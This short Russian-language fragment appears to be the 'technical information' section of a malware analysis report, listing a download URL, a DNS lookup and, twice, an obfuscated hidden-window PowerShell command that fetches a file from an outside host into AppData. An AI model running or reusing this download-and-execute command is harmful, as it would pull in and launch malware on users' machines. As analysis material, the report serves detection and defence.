Техническая информация
- http://semiconductry.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POweRsHEll.EXE -EXECutIonPOLICY BypAsS -nOPROFILE -WiNdOWSTYlE HIDDEn (NEw-OBject SysTEM.NeT.wEBCLIENT).DowNloADfiLE('http://semiconductry.top/search.php','%AppData%.EXE');sT...
- DNS ASK se####nductry.top
- '<SYSTEM32>\cmd.exe' /C "POweRsHEll.EXE -EXECutIonPOLICY BypAsS -nOPROFILE -WiNdOWSTYlE HIDDEn (NEw-OBject SysTEM.NeT.wEBCLIENT).DowNloADfiLE('http://semiconductry.top/search.php','%AppData%.EXE');sT...' (со скрытым окном)